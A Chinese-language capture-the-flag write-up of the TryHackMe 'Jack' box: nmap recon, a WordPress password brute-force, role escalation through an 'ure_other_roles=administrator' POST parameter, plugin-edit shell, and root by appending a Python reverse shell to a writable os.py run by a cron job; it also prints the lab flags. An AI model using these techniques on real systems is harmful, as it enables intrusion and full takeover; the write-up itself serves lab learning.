端口扫描

sudo nmap --min-rate 10000 -p- 10.10.194.143        
[sudo] mikannse 的密码:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-16 20:55 CST
Warning: 10.10.194.143 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.194.143
Host is up (0.23s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
sudo nmap -sT -sV -sC -O -p22,80 10.10.194.143         
[sudo] mikannse 的密码:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-16 20:56 CST
Nmap scan report for 10.10.194.143
Host is up (0.23s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 3e:79:78:08:93:31:d0:83:7f:e2:bc:b6:14:bf:5d:9b (RSA)
| 256 3a:67:9f:af:7e:66:fa:e3:f8:c7:54:49:63:38:a2:93 (ECDSA)
|_ 256 8c:ef:55:b0:23:73:2c:14:09:45:22:ac:84:cb:40:d2 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-generator: WordPress 5.3.2
|_http-title: Jack's Personal Site – Blog for Jacks writing adven...
|_http-server-header: Apache/2.4.18 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (96%), Linux 5.4 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (93%), Sony Android TV (Android 5.0) (93%), Android 5.0 - 6.0.1 (Linux 3.4) (93%), Android 5.1 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
sudo nmap --script=vuln -p22,80 10.10.194.143       
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-16 20:56 CST
Nmap scan report for 10.10.194.143
Host is up (0.23s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.194.143
| Found the following possible CSRF vulnerabilities:
|
| Path: http://10.10.194.143:80/
| Form id: search
|_ Form action: http://jack.thm
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
| http-wordpress-users:
| Username found: jack
| Username found: wendy
| Username found: danny
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
| http-enum:
| /wp-login.php: Possible admin folder
| /wp-json: Possible admin folder
| /robots.txt: Robots file
| /readme.html: Wordpress version: 2
| /: WordPress version: 5.3.2
| /wp-includes/images/rss.png: Wordpress version 2.2 found.
| /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
| /wp-includes/images/blank.gif: Wordpress version 2.6 found.
| /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
| /wp-login.php: Wordpress login page.
| /wp-admin/upgrade.php: Wordpress login page.
| /readme.html: Interesting, a readme.
|_ /0/: Potentially interesting folder

Nmap done: 1 IP address (1 host up) scanned in 1006.43 seconds

Web

看样子是个WP站点,有些页面访问不了,看来要添加host:jack.thm。在上面得到三个用户名jack,wendy.danny,爆破一下密码试试

因为不想浪费时间,看WP是用这个字典,而且rockyou里面还没有密码=.=

wpscan --url http://jack.thm/wp-login.php -U ./桌面/user.txt  -P /usr/share/wordlists/fasttrack.txt

wendy:changelater

登录发现我们并不能更改主题来反弹shell,确实如果是这样也太没意思了。版本是5.3.2,搜索了一下这个版本的漏洞。有个RCE,但是用MSF跑不出来。看了下THM的提示ure_other_roles。搜索了一下,似乎可以利用配置文件的漏洞。

Getshell

点击Profile,点击update profile。添加‘&ure_other_roles=administrator’到POST数据的末尾,然后发包。发现左侧栏多了很多东西。但是这次不能更改外观里的PHP了,但是可以更新插件,选择插件akismet.php,改别的插件应该也行

然后访问 http://jack.thm/wp-content/plugins/akismet/akismet.php

得到shell

家目录user.txt

0052f7829e48752f2e7bf50f1231548a

横向移动

在/var/backups发现一个id_rsa,拷贝到Kali爆破试试,但是似乎不需要爆破

chmod 600 id_rsa
ssh -i id_rsa jack@jack.thm

登陆成功

没有sudo,没有crontab,什么都没有。

提权

但是在/opt/statuscheck/发现一个checker.py

import os

os.system("/usr/bin/curl -s -I http://127.0.0.1 >> /opt/statuscheck/output.log")

但是发现并运行不了,嘶,虽然说这个明显就是利用点。看下WP,用了pspy(一个可以查看用户进程如crontab的工具)

https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64

上传到机器上

chmod +x pspy64
./pspy64

然后我们发现checker.py是一个定时任务。所以不用我们运行,但是我们也更改不了。也许可以试试更改os的库源文件

locate os.py

/usr/lib/python2.7/os.py

发现我们有权限可以修改

添加反弹shell,kali开启监听

echo 'import socket
import pty
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.11.38.245",1235))
dup2(s.fileno(),0)
dup2(s.fileno(),1)
dup2(s.fileno(),2)
pty.spawn("/bin/bash")'>>os.py

好像还要添加在末尾?试过放在开头运行不了

然后我们就收到了一个root身份的反弹shell

root.txt

b8b63a861cc09e853f29d8055d64bffb

碎碎念

对于wordpress的exploit又有了更广泛的认识,然后还有pspy吧,定时任务可不只有cat /etc/crontab啊kora!!!